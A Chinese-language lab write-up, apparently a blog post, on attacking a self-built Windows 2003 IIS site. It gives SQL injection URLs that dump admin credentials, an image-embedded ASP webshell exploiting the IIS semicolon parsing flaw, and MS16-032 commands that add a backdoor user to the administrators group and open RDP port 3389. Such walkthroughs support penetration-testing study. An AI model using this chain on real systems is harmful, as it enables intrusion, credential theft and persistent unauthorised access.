利用ms16-032提权并打开3389端口

利用ms16-032提权并打开3389端口

1、在VM中创建win 2003,在win2003上安装iis服务并开启服务

在这里插入图片描述

2、配置iis服务

在这里插入图片描述在这里插入图片描述在这里插入图片描述

3、上传源码及配置网站

在这里插入图片描述在这里插入图片描述给put文件设置权限,添加iis访问权限
在这里插入图片描述
设置默认访问页面 index.asp
在这里插入图片描述
web服务拓展允许pages
在这里插入图片描述

访问192.168.x.x
在这里插入图片描述

4、修改checksql文件进行sql注入

在这里插入图片描述在这里插入图片描述
判断注入点

http://192.168.8.130/shownews.asp?id=275 and 1=1

在这里插入图片描述http://192.168.8.130/shownews.asp?id=275 and1=2

在这里插入图片描述
存在注入点
用order by 字段数

http://192.168.8.130/shownews.asp?id=275 and 1=1 order by 10

在这里插入图片描述
对其进行手工注入

http://192.168.8.130/shownews.asp?id=275 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10 from admin

因为数据库是sccsql所以后面添加from XXX
可以得到回显点2,3,7,8,9,
在这里插入图片描述http://192.168.8.130/shownews.asp?id=275 and 1=2 UNION SELECT 1,username,password,4,5,6,7,8,9,10 from admin
得到账户admin密码:admin
在这里插入图片描述
利用得到的账号密码登入后台
在这里插入图片描述

5、修改upload_photo.asp文件上传图片码用蚁剑连接

在这里插入图片描述在这里插入图片描述

6、制作asp图片码

命令: copy 1.jpg/b+1.asp/a 2.jpg 上传图片码

在这里插入图片描述
上传文件名为123.asp;1.jpg 这里利用的是iis解析漏洞从左向右解析
在这里插入图片描述
解析文件
http://192.168.8.130/UploadFiles/123.asp;1.jpg
在这里插入图片描述
用蚁剑或者菜刀进行连接
在这里插入图片描述

7、上传cmd命令

在这里插入图片描述在这里插入图片描述

8、上传ms16-032进行提权

在这里插入图片描述在这里插入图片描述
命令:
查看权限 c:/put/pic/ms16-032.exe “whoami”
创建用户 c:/put/pic/ms16-032.exe “net user 123 123 /add”
将kzc提权到administrator组 c:/put/pic/ms16-032.exe “net localgroup administrator 123 /add”
在这里插入图片描述

9、上传3389.bat文件,开启3389端口

命令c:/put/pic/ms16-032.exe c:/put/pic/3389.bat
在这里插入图片描述在这里插入图片描述
快捷打开远程连接命令 mstsc

在这里插入图片描述

10、标题下载360卫士打补丁包

在这里插入图片描述
关闭360卫士,对目标进行提权创建123账户失败

在这里插入图片描述在这里插入图片描述

11、查看所有端口

命令:

netstat -ant 

版权声明:本文为qq_45405155原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。